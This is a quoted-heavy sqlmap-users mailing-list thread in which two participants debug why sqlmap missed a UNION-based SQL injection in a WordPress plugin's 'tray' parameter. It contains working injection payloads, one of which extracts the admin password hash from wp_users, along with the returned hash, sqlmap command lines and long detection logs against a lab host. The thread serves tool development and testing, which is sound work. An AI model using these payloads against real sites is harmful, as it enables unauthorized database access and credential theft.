>>>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user:
>>>>>>>
>>>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>>>
>>>>>>>
>>>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).
>>>>>>>
>>>>>>> Just a thought!
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>>> http://www.volatileminds.net -- website
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2014-12-15 20:39:33
Looking into the traffic file I don't see "obvious" trails of SQLi. If you are satisfied with your findings I won't look any further.

Bye

On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...> wrote:
>
> Aha, I got it:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5 --risk=3 -o
>     _
>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:54:50
>
> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
> [09:54:50] [INFO] setting file for logging HTTP traffic
> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
> [09:54:50] [INFO] testing connection to the target URL
> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [09:54:51] [WARNING] reflective value(s) found and filtering out
> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random number) - 1 to 10 columns' injectable
> POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
> sqlmap identified the following injection points with a total of 26 HTTP(s) requests:
> ---
> Parameter: tray (POST)
>     Type: UNION query
>     Title: MySQL UNION query (random number) - 1 column
>     Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
> ---
> [09:55:02] [INFO] testing MySQL
> [09:55:02] [INFO] confirming MySQL
> [09:55:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Apache 2.4.7, PHP 5.5.9
> back-end DBMS: MySQL >= 5.0.0
> [09:55:03] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'
>
> [*] shutting down at 09:55:03
>
> bperry@ubuntu:~/tools/sqlmap$
>
>
> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...> wrote:
>>
>> Sorry, one more thing to note, the following command gets very close to exploiting the injection:
>>
>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>
>> The only problem is that the union-char is 'f', when I was hoping it would be 0x66. When I capture the request and replace 'f' with 0x66, the injection works. Looks like ' is a bad char.
>>
>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...> wrote:
>>>
>>> Playing with the queries sqlmap sends a bit more:
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>
>>> This results in a 0 being returned where the password hash was in the successful injection:
>>>
>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>>         ^ injection result
>>>
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>
>>> This payload also results in a 0 being returned, not 'fdsa' as you would expect.
>>>
>>> However, this payload does return 'fdsa'
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#&mid=1
>>>
>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]
>>>
>>>
>>> Hope this helps.
>>>
>>>
>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bpe...@gm...> wrote:
>>>>
>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>>     _
>>>>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
>>>> |_ -| . | |     | .'| . |
>>>> |___|_  |_|_|_|_|__,|  _|
>>>>       |_|           |_|   http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>>
>>>> [*] starting at 08:56:27
>>>>
>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>> [08:56:27] [INFO] flushing session file
>>>> [08:56:27] [INFO] testing connection to the target URL
>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
>>>> [08:56:28] [INFO] target URL is stable
>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY
clauses' >>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY >>>> and ORDER BY clauses' >>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >>>> HAVING clause' >>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or >>>> HAVING clause (EXTRACTVALUE)' >>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or >>>> HAVING clause (UPDATEXML)' >>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or >>>> HAVING clause (BIGINT UNSIGNED)' >>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or >>>> HAVING clause' >>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or >>>> HAVING clause' >>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or >>>> HAVING clause (EXTRACTVALUE)' >>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or >>>> HAVING clause (UPDATEXML)' >>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or >>>> HAVING clause (BIGINT UNSIGNED)' >>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or >>>> HAVING clause' >>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING >>>> clause' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace >>>> (EXTRACTVALUE)' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace >>>> (UPDATEXML)' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace >>>> (BIGINT UNSIGNED)' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and >>>> ORDER BY clauses' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and >>>> ORDER BY clauses (EXTRACTVALUE)' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and >>>> ORDER BY clauses (UPDATEXML)' >>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and >>>> ORDER BY clauses (BIGINT UNSIGNED)' 
>>>> [08:58:08] [INFO] testing 'MySQL inline queries' >>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries' >>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' >>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind >>>> (comment)' >>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy >>>> query)' >>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND >>>> time-based blind (heavy query)' injectable >>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' >>>> [08:58:26] [INFO] automatically extending ranges for UNION query >>>> injection technique tests as there is at least one other (potential) >>>> technique found >>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 >>>> columns >>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 >>>> columns' >>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns' >>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 >>>> columns' >>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns' >>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 >>>> columns' >>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns' >>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 >>>> columns' >>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns' >>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to >>>> 100 columns' >>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' >>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to >>>> 20 columns' >>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 >>>> columns' >>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to >>>> 40 columns' 
>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 >>>> columns' >>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to >>>> 60 columns' >>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 >>>> columns' >>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to >>>> 80 columns' >>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 >>>> columns' >>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to >>>> 100 columns' >>>> [08:58:54] [INFO] checking if the injection point on POST parameter >>>> 'tray' is a false positive >>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the >>>> others (if any)? [y/N] n >>>> sqlmap identified the following injection points with a total of 2049 >>>> HTTP(s) requests: >>>> --- >>>> Parameter: tray (POST) >>>> Type: AND/OR time-based blind >>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query) >>>> Payload: action=getMailMessage&tray=in_deleted AND >>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1 >>>> --- >>>> [08:59:48] [INFO] testing MySQL >>>> [08:59:48] [WARNING] it is very important not to stress the network >>>> adapter during usage of time-based payloads to prevent potential errors >>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses >>>> (option '--time-sec')? 
[Y/n] >>>> [08:59:51] [INFO] confirming MySQL >>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response >>>> times >>>> [08:59:53] [INFO] the back-end DBMS is MySQL >>>> web server operating system: Linux Ubuntu >>>> web application technology: Apache 2.4.7, PHP 5.5.9 >>>> back-end DBMS: MySQL >= 5.0.0 >>>> [08:59:53] [INFO] fetched data logged to text files under >>>> '/home/bperry/.sqlmap/output/172.31.16.26' >>>> >>>> [*] shutting down at 08:59:53 >>>> >>>> bperry@ubuntu:~/tools/sqlmap$ >>>> >>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar < >>>> mir...@gm...> wrote: >>>>> >>>>> Hi. >>>>> >>>>> I don't see a reason why this form of UNION test would be any >>>>> different than the regular used by sqlmap. Can you please send me the >>>>> traffic file for such run (... --flush-session -t traffic.txt) along with >>>>> console output? >>>>> >>>>> Bye >>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> >>>>> wrote: >>>>> >>>>>> Hello! >>>>>> >>>>>> Playing around with the following vulnerabivlity: >>>>>> >>>>>> http://www.exploit-db.com/exploits/35505/ >>>>>> >>>>>> >>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 >>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' >>>>>> does result in a response from the server with the hash of the first user: >>>>>> >>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION >>>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split] >>>>>> >>>>>> >>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap >>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one >>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT >>>>>> CONCAT(blah, blah, blah) FROM blah). >>>>>> >>>>>> Just a thought! 
>>>>>> --
>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>> http://www.volatileminds.net -- website
>>>>>>
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:55:36
Aha, I got it:

bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5 --risk=3 -o
_
___ ___| |_____ ___ ___ {1.0-dev-180ede0}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:54:50

[09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
[09:54:50] [INFO] setting file for logging HTTP traffic
[09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
[09:54:50] [INFO] testing connection to the target URL
[09:54:50] [INFO] heuristics detected web page charset 'ascii'
[09:54:50] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
[09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
[09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:54:51] [WARNING] reflective value(s) found and filtering out
[09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
[09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random number) - 1 to 10 columns' injectable
POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)?
[y/N] n
sqlmap identified the following injection points with a total of 26 HTTP(s) requests:
---
Parameter: tray (POST)
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
---
[09:55:02] [INFO] testing MySQL
[09:55:02] [INFO] confirming MySQL
[09:55:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:55:03] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'

[*] shutting down at 09:55:03

bperry@ubuntu:~/tools/sqlmap$

On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...> wrote:
>
> Sorry, one more thing to note, the following command gets very close to exploiting the injection:
>
> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>
> The only problem is that the union-char is 'f', when I was hoping it would be 0x66. When I capture the request and replace 'f' with 0x66, the injection works. Looks like ' is a bad char.
>
> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...> wrote:
>>
>> Playing with the queries sqlmap sends a bit more:
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>
>> This results in a 0 being returned where the password hash was in the successful injection:
>>
>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>> ^ injection result
>>
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>
>> This payload also results in a 0 being returned, not 'fdsa' as you would expect.
>> >> However, this payload does return 'fdsa' >> >> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT >> 1,1#&mid=1 >> >> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT >> 1,1#[split] >> >> >> Hope this helps. >> >> >> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry < >> bpe...@gm...> wrote: >>> >>> Here is the console output. Attached is the traffic log in a zip: >>> >>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 >>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt >>> _ >>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0} >>> |_ -| . | | | .'| . | >>> |___|_ |_|_|_|_|__,| _| >>> |_| |_| http://sqlmap.org >>> >>> [!] legal disclaimer: Usage of sqlmap for attacking targets without >>> prior mutual consent is illegal. It is the end user's responsibility to >>> obey all applicable local, state and federal laws. Developers assume no >>> liability and are not responsible for any misuse or damage caused by this >>> program >>> >>> [*] starting at 08:56:27 >>> >>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req' >>> [08:56:27] [INFO] setting file for logging HTTP traffic >>> [08:56:27] [INFO] flushing session file >>> [08:56:27] [INFO] testing connection to the target URL >>> [08:56:27] [INFO] heuristics detected web page charset 'ascii' >>> [08:56:27] [INFO] testing if the target URL is stable. 
This can take a >>> couple of seconds >>> [08:56:28] [INFO] target URL is stable >>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter >>> 'tray' might not be injectable >>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray' >>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >>> clause' >>> [08:56:28] [WARNING] reflective value(s) found and filtering out >>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >>> clause (MySQL comment)' >>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >>> clause (Generic comment)' >>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >>> clause' >>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >>> clause (MySQL comment)' >>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >>> clause (Generic comment)' >>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, >>> ORDER BY or GROUP BY clause (RLIKE)' >>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter >>> replace (original value)' >>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace >>> (MAKE_SET - original value)' >>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace >>> (ELT - original value)' >>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace >>> (bool*int - original value)' >>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter >>> replace (original value)' >>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter >>> replace (original value)' >>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and >>> ORDER BY clauses' >>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and >>> ORDER BY clauses (original value)' >>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY >>> and ORDER BY clauses' >>> [08:57:31] [INFO] testing 
'MySQL < 5.0 boolean-based blind - GROUP BY >>> and ORDER BY clauses' >>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >>> HAVING clause' >>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or >>> HAVING clause (EXTRACTVALUE)' >>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or >>> HAVING clause (UPDATEXML)' >>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or >>> HAVING clause (BIGINT UNSIGNED)' >>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or >>> HAVING clause' >>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING >>> clause' >>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING >>> clause (EXTRACTVALUE)' >>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING >>> clause (UPDATEXML)' >>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING >>> clause (BIGINT UNSIGNED)' >>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING >>> clause' >>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' >>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' >>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace >>> (EXTRACTVALUE)' >>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace >>> (UPDATEXML)' >>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace >>> (BIGINT UNSIGNED)' >>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER >>> BY clauses' >>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER >>> BY clauses (EXTRACTVALUE)' >>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER >>> BY clauses (UPDATEXML)' >>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER >>> BY clauses (BIGINT UNSIGNED)' >>> [08:58:08] [INFO] testing 'MySQL inline queries' >>> [08:58:08] [INFO] testing 
'MySQL > 5.0.11 stacked queries' >>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' >>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)' >>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy >>> query)' >>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND >>> time-based blind (heavy query)' injectable >>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' >>> [08:58:26] [INFO] automatically extending ranges for UNION query >>> injection technique tests as there is at least one other (potential) >>> technique found >>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 >>> columns >>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 >>> columns' >>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns' >>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 >>> columns' >>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns' >>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 >>> columns' >>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns' >>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 >>> columns' >>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns' >>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 >>> columns' >>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' >>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 >>> columns' >>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns' >>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to >>> 40 columns' >>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns' >>> [08:58:48] [INFO] testing 'Generic UNION query 
(random number) - 42 to >>> 60 columns' >>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns' >>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to >>> 80 columns' >>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 >>> columns' >>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to >>> 100 columns' >>> [08:58:54] [INFO] checking if the injection point on POST parameter >>> 'tray' is a false positive >>> POST parameter 'tray' is vulnerable. Do you want to keep testing the >>> others (if any)? [y/N] n >>> sqlmap identified the following injection points with a total of 2049 >>> HTTP(s) requests: >>> --- >>> Parameter: tray (POST) >>> Type: AND/OR time-based blind >>> Title: MySQL < 5.0.12 AND time-based blind (heavy query) >>> Payload: action=getMailMessage&tray=in_deleted AND >>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1 >>> --- >>> [08:59:48] [INFO] testing MySQL >>> [08:59:48] [WARNING] it is very important not to stress the network >>> adapter during usage of time-based payloads to prevent potential errors >>> do you want sqlmap to try to optimize value(s) for DBMS delay responses >>> (option '--time-sec')? [Y/n] >>> [08:59:51] [INFO] confirming MySQL >>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response >>> times >>> [08:59:53] [INFO] the back-end DBMS is MySQL >>> web server operating system: Linux Ubuntu >>> web application technology: Apache 2.4.7, PHP 5.5.9 >>> back-end DBMS: MySQL >= 5.0.0 >>> [08:59:53] [INFO] fetched data logged to text files under >>> '/home/bperry/.sqlmap/output/172.31.16.26' >>> >>> [*] shutting down at 08:59:53 >>> >>> bperry@ubuntu:~/tools/sqlmap$ >>> >>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar < >>> mir...@gm...> wrote: >>>> >>>> Hi. >>>> >>>> I don't see a reason why this form of UNION test would be any different >>>> than the regular used by sqlmap. 
>>>> Can you please send me the traffic file for such run (... --flush-session -t traffic.txt) along with console output?
>>>>
>>>> Bye
>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
>>>>
>>>>> Hello!
>>>>>
>>>>> Playing around with the following vulnerability:
>>>>>
>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>
>>>>>
